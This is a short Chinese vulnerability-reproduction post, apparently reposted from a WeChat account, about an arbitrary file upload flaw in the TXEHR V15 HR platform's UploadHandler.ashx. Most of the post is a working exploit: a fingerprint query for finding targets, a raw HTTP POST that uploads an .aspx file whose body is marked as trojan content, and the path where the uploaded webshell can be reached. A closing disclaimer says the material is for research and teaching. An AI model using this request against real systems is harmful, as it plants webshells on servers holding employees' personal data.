同享软件成立于1997年,运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。同享TXEHR V15人力管理管理平台UploadHandler存在任意文件上传漏洞。
首页
bp发包
链接地址:地址/Handler/Uploadfile2/1.aspx
body="/Assistant/Default.aspx"
POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1 Host: 地址 accept: */* Content-Type: multipart/form-data; boundary=---------------------------123 Content-Length: 169 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------123 Content-Disposition: form-data; name="Filedata"; filename="1.aspx" Content-Type: text/plain 木马内容 -----------------------------123--
原文始发于微信公众号(我吃饼干):【漏洞复现】同享EHR存在UploadHandler.ashx文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论